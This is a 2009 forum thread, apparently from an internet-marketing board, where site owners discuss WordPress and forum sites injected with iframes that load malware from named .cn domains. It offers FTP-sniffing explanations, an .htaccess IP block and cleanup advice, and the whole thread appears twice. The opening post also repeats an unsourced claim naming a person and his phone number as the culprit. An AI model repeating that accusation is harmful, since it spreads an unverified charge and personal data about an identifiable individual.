Have Your Websites Been iframe Hacked Also?

Jared Alberghini · 07-19-2009, 04:17 PM

Heads up people...

Over the past few days, a couple of my sites running WP have been hacked. There is an iframe script inserted into the bottom of a few files, the main index.php, the admin index.php and the theme index.php which loads up: microsotf.cn or updatedate.cn

Don't go to these sites, it automatically downloads a trojan that AVG does not catch. Avast will catch it, but I still don't suggest going to those sites, unless you want to spend the afternoon removing spyware & trojans from your computer.

After doing some research, this seems to be a fairly new, very nasty virus/spyware/malware/whateverware... that is self replicating and spreading fast.

"Seems to be originating from the Academy of Sciences, Federation of Russia Their equivalent to our ITT Tech) using their campus servers in Kazakstan and Latvia before running through the European Union then jumping the Atlantic to here. The student is Nevdomskiy Alexey Alexeevich and can be reached at +79024883214"

Apparently, it is not a WordPress exploit, since I have found others running forum software who have also been compromised.

It seems this is an FTP exploit, possibly from spyware on your computer or from compromised files on your server that captures your FTP user/pass somehow.

One tip is that you should not have the same password for your MySQL database, because that is typically stored in plain text in most config files. If a hacker can read your config files somehow, and you use the same sql pass as your FTP password, well, then they know your FTP pass. Not good.

I have not found the exact solution, have tried everything suggested, one of my sites that was infected was fairly new, so I deleted EVERYTHING, changed my FTP & MySQL passwords, installed a fresh version of WordPress, and the next day, the iframe hack came back.

I just blocked the ip address: 91.212.198.37

.htaccess

order allow,deny
deny from 91.212.0
allow from all

I'll report back if the iframes are back tomorrow after blocking that ip range.

Here are some links to some good discussions about this iframe hack:

Web site hack loading microsotf.cn | Geeked Info

Website hack – microsotf.cn – Wordpress | Web Design, Raleigh NC - Matt Swanner

Here is an older article/blog post, it does not mention these new .cn domains, but still good info:

Malicious ?Income? IFrames from .CN Domains | Unmask Parasites. Blog.

Does anyone have any additional information about this hack and how to eliminate this threat 100%?

.jrd

Abledragon · 07-19-2009, 06:51 PM

Jared, hi,

I'm really sorry to hear you got hacked like that. That's a real bummer.

I don't have any extra info on these iframe attacks, but it does emphasise the need to use SFTP, rather than FTP.

I recently changed my hosting provider because the one I was using before did not support SFTP and, despite several requests from me, couldn't give a deadline by when they would support it.

SFTP support should be a primary consideration in anyone's selection of a hosting provider, especially as most FTP clients support it.

Having said that, if a hacker is determined to access your site they will. But taking the precautions I've set out in this article will help to prevent the mass bot attacks:

http://www.wealthydragon.com/blog/20...ten-left-open/

Cheers,

Martin.

skydivedad · 07-20-2009, 11:18 AM

Hi Jared
Sorry to hear about all this it's just awful! I use the I-Frame Buster WordPress Plugin to great effect. It will help protect your wordpress blog from future iframe hijackers i.e. DiggBar users and other such cretins.
Hope this Helps
Paul

ramone_johnny · 07-20-2009, 11:22 AM

If this is the virus that I had, its a nightmare. The virus lays dormant on your local machine, "listening" for any FTP activity. As soon as you FTP up to ANY site from the infected workstation, it detects the username and password, then goes about over writing ANY index files.

I never found a fix, a patch, or even any anti virus that would get rid of it. I had to blow my machine away and reinstall the OS. Changing passwords etc is useless, because as soon as you FTP again, the cycle repeats.

ramone_johnny · 07-20-2009, 11:31 AM

Actually from memory this has to do with an Adobe vulnerability. Be sure to update your readers to the latest version.

Superior · 07-20-2009, 12:05 PM

My sites was also hacked same like this. I am agree with ramone johnny that this situation cab be happen when you computer is effected with virus.
I have clean my PC and installed a fresh copy of windows so now it not happen again.

kindsvater · 07-20-2009, 02:07 PM

That iframe attack is a real bear to track down and it commonly avoids detection by antivirus software. Fortunately, your web host should be able to automatically and quickly clean-up the files.

Here are suggestions from Hostgator:

"From our experience with malware of this nature, the user account passwords are compromised though viruses/malware located on your local computer. This malware sniffs out passwords used and stored by FTP programs located on the computer. In order to protect against future attack, you will need to run full virus and malware scans on your computers to ensure that they are clean. I recommend using multiple scanners as we have found that some scanners do not detect the malware.

MalwareBytes ( Malwarebytes.org ) and ComboFix ( A guide and tutorial on using ComboFix ) have been reported to be able to clean this malware. Once this is done, please change all account passwords."

My suggestion - run both. It's always fascinating, and a little disturbing, to see new viruses / malware detected by different anti-virus programs.

naphets66 · 07-20-2009, 02:15 PM

I went through this a year ago and documented it pretty well here: Sites and Cpanel Hacked with prevedvsem123.cn Virus | Stephan Miller

It turned out with this one, the iframes were even in Cpanel and infected the whole bank of dedicated servers. I ended up moving to a new host. Hopefully that is not the case here.

ecdavis · 07-20-2009, 09:02 PM

You have my sympathies. I have also relatively recently dealt with my sites being being taken hacked. Either the hacker is getting to your sites via a vulnerability in your hosting or a vulnerability in your local machine. You'll have to determine which it is. If you eliminate hosting, than it may be necessary to reformat your hard drive and reinstall your software. That's the only way you'll be 100% sure that the malware is off your machine. Following that, be sure to run a firewall and antivirus software running at all times.

Evan

Gary McCaffrey · 07-20-2009, 09:39 PM

Yes this happened to a lot of my sites recently.

I got infected shortly after doing some work on a friends computer, I didn't use FTP but I did log into cpanel. After changing my password and amending the infected files from my own computer it hasn't came back.

07-19-2009, 04:17 PM	#1
Jared Alberghini Godson of The Godfather War Room Member Join Date: Nov 2004 Location: The NorthEast Kingdom - Vermont, USA Posts: 2,163 Blog Entries: 25 Thanks: 786 Thanked 1,064 Times in 441 Posts Social Networking	Have Your Websites Been iframe Hacked Also? Heads up people... Over the past few days, a couple of my sites running WP have been hacked. There is an iframe script inserted into the bottom of a few files, the main index.php, the admin index.php and the theme index.php which loads up: microsotf.cn or updatedate.cn Don't go to these sites, it automatically downloads a trojan that AVG does not catch. Avast will catch it, but I still don't suggest going to those sites, unless you want to spend the afternoon removing spyware & trojans from your computer. After doing some research, this seems to be a fairly new, very nasty virus/spyware/malware/whateverware... that is self replicating and spreading fast. "Seems to be originating from the Academy of Sciences, Federation of Russia Their equivalent to our ITT Tech) using their campus servers in Kazakstan and Latvia before running through the European Union then jumping the Atlantic to here. The student is Nevdomskiy Alexey Alexeevich and can be reached at +79024883214" Apparently, it is not a WordPress exploit, since I have found others running forum software who have also been compromised. It seems this is an FTP exploit, possibly from spyware on your computer or from compromised files on your server that captures your FTP user/pass somehow. One tip is that you should not have the same password for your MySQL database, because that is typically stored in plain text in most config files. If a hacker can read your config files somehow, and you use the same sql pass as your FTP password, well, then they know your FTP pass. Not good. I have not found the exact solution, have tried everything suggested, one of my sites that was infected was fairly new, so I deleted EVERYTHING, changed my FTP & MySQL passwords, installed a fresh version of WordPress, and the next day, the iframe hack came back. I just blocked the ip address: 91.212.198.37 .htaccess order allow,deny deny from 91.212.0 allow from all I'll report back if the iframes are back tomorrow after blocking that ip range. Here are some links to some good discussions about this iframe hack: Web site hack loading microsotf.cn \| Geeked Info Website hack – microsotf.cn – Wordpress \| Web Design, Raleigh NC - Matt Swanner Here is an older article/blog post, it does not mention these new .cn domains, but still good info: Malicious ?Income? IFrames from .CN Domains \| Unmask Parasites. Blog. Does anyone have any additional information about this hack and how to eliminate this threat 100%? .jrd
	TelekineticMarketing.com helps you connect with other IM Entrepreneurs like never before. Be FIRST To Join TM For FREE -> Private Mastermind Groups for IM Entrepreneurs

07-19-2009, 06:51 PM	#2
Abledragon Advanced Warrior Join Date: May 2007 Location: Hong Kong. Posts: 960 Thanks: 3 Thanked 173 Times in 153 Posts Social Networking Contact Info	Re: Have Your Websites Been iframe Hacked Also? Jared, hi, I'm really sorry to hear you got hacked like that. That's a real bummer. I don't have any extra info on these iframe attacks, but it does emphasise the need to use SFTP, rather than FTP. I recently changed my hosting provider because the one I was using before did not support SFTP and, despite several requests from me, couldn't give a deadline by when they would support it. SFTP support should be a primary consideration in anyone's selection of a hosting provider, especially as most FTP clients support it. Having said that, if a hacker is determined to access your site they will. But taking the precautions I've set out in this article will help to prevent the mass bot attacks: http://www.wealthydragon.com/blog/20...ten-left-open/ Cheers, Martin.
	Free eBook: How to Start a Business Online

07-20-2009, 11:18 AM	#3
skydivedad Paul Mabry-Gravity Sucks War Room Member Join Date: Feb 2007 Location: , , USA. Posts: 422 Blog Entries: 2 Thanks: 85 Thanked 117 Times in 42 Posts Social Networking Contact Info	Re: Have Your Websites Been iframe Hacked Also? Hi Jared Sorry to hear about all this it's just awful! I use the I-Frame Buster WordPress Plugin to great effect. It will help protect your wordpress blog from future iframe hijackers i.e. DiggBar users and other such cretins. Hope this Helps Paul
	Making Lemonaide... Skydivedad's Blog

07-20-2009, 11:22 AM	#4
ramone_johnny No excuses - Just do it War Room Member Join Date: Mar 2009 Location: Sydney Posts: 3,284 Thanks: 758 Thanked 1,345 Times in 673 Posts	Re: Have Your Websites Been iframe Hacked Also? If this is the virus that I had, its a nightmare. The virus lays dormant on your local machine, "listening" for any FTP activity. As soon as you FTP up to ANY site from the infected workstation, it detects the username and password, then goes about over writing ANY index files. I never found a fix, a patch, or even any anti virus that would get rid of it. I had to blow my machine away and reinstall the OS. Changing passwords etc is useless, because as soon as you FTP again, the cycle repeats.

07-20-2009, 11:31 AM	#5
ramone_johnny No excuses - Just do it War Room Member Join Date: Mar 2009 Location: Sydney Posts: 3,284 Thanks: 758 Thanked 1,345 Times in 673 Posts	Re: Have Your Websites Been iframe Hacked Also? Actually from memory this has to do with an Adobe vulnerability. Be sure to update your readers to the latest version.

07-20-2009, 12:05 PM	#6
Superior Banned Join Date: Jul 2009 Posts: 38 Thanks: 1 Thanked 3 Times in 3 Posts	Re: Have Your Websites Been iframe Hacked Also? My sites was also hacked same like this. I am agree with ramone johnny that this situation cab be happen when you computer is effected with virus. I have clean my PC and installed a fresh copy of windows so now it not happen again.

07-20-2009, 02:07 PM	#7
kindsvater Senior Warrior Attorney War Room Member Join Date: Jul 2004 Location: Jedi Temple Posts: 2,902 Blog Entries: 32 Thanks: 70 Thanked 2,175 Times in 639 Posts	Re: Have Your Websites Been iframe Hacked Also? That iframe attack is a real bear to track down and it commonly avoids detection by antivirus software. Fortunately, your web host should be able to automatically and quickly clean-up the files. Here are suggestions from Hostgator: "From our experience with malware of this nature, the user account passwords are compromised though viruses/malware located on your local computer. This malware sniffs out passwords used and stored by FTP programs located on the computer. In order to protect against future attack, you will need to run full virus and malware scans on your computers to ensure that they are clean. I recommend using multiple scanners as we have found that some scanners do not detect the malware. MalwareBytes ( Malwarebytes.org ) and ComboFix ( A guide and tutorial on using ComboFix ) have been reported to be able to clean this malware. Once this is done, please change all account passwords." My suggestion - run both. It's always fascinating, and a little disturbing, to see new viruses / malware detected by different anti-virus programs.
	Stop Lawsuits Cold - Internet Marketing Law Center - Hundreds of Warrior Members California Noncompete Agreements - California Employment Law - Warrior Blog

07-20-2009, 02:15 PM	#8
naphets66 HyperActive Warrior Join Date: Mar 2003 Location: Kansas City, MO, USA Posts: 224 Thanks: 7 Thanked 1 Time in 1 Post Social Networking	Re: Have Your Websites Been iframe Hacked Also? I went through this a year ago and documented it pretty well here: Sites and Cpanel Hacked with prevedvsem123.cn Virus \| Stephan Miller It turned out with this one, the iframes were even in Cpanel and infected the whole bank of dedicated servers. I ended up moving to a new host. Hopefully that is not the case here.
	Kansas City SEO Clickbank Affiliate Marketing Blog Follow Me on Twitter

07-20-2009, 09:02 PM	#9
ecdavis Advanced Warrior War Room Member Join Date: Jan 2005 Location: Iowa City, IA USA Posts: 811 Thanks: 86 Thanked 52 Times in 41 Posts	Re: Have Your Websites Been iframe Hacked Also? You have my sympathies. I have also relatively recently dealt with my sites being being taken hacked. Either the hacker is getting to your sites via a vulnerability in your hosting or a vulnerability in your local machine. You'll have to determine which it is. If you eliminate hosting, than it may be necessary to reformat your hard drive and reinstall your software. That's the only way you'll be 100% sure that the malware is off your machine. Following that, be sure to run a firewall and antivirus software running at all times. Evan

07-20-2009, 09:39 PM	#10
Gary McCaffrey Advanced Warrior War Room Member Join Date: Jan 2003 Location: Belfast, Ireland. Posts: 851 Thanks: 22 Thanked 59 Times in 46 Posts Social Networking	Re: Have Your Websites Been iframe Hacked Also? Yes this happened to a lot of my sites recently. I got infected shortly after doing some work on a friends computer, I didn't use FTP but I did log into cpanel. After changing my password and amending the infected files from my own computer it hasn't came back.
	PaySpree.com - The Instant Commission Affiliate Network!